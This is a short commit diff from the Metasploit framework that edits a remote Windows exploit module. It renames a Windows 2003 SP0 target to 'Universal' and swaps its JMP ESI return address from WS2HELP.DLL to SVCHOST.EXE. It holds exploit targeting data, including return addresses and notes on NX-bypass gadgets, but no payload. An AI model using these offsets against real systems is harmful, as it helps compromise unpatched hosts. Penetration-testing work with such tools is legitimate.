Make 2003 target universal
git-svn-id: file:///home/svn/framework3/trunk@5888 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
54cd265f82
commit
b665212b35
|
@ -118,12 +118,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||||
|
|
||||||
# Standard return-to-ESI without NX bypass
|
# Standard return-to-ESI without NX bypass
|
||||||
[ 'Windows 2003 SP0 English (NO NX)',
|
[ 'Windows 2003 SP0 Universal',
|
||||||
{
|
{
|
||||||
'Ret' => 0x71bf175f,
|
'Ret' => 0x0100129e,
|
||||||
'Scratch' => 0x00020408,
|
'Scratch' => 0x00020408,
|
||||||
}
|
}
|
||||||
], # JMP ESI WS2HELP.DLL
|
], # JMP ESI SVCHOST.EXE
|
||||||
|
|
||||||
|
|
||||||
# Standard return-to-ESI without NX bypass
|
# Standard return-to-ESI without NX bypass
|
||||||
|
|
Loading…
Reference in New Issue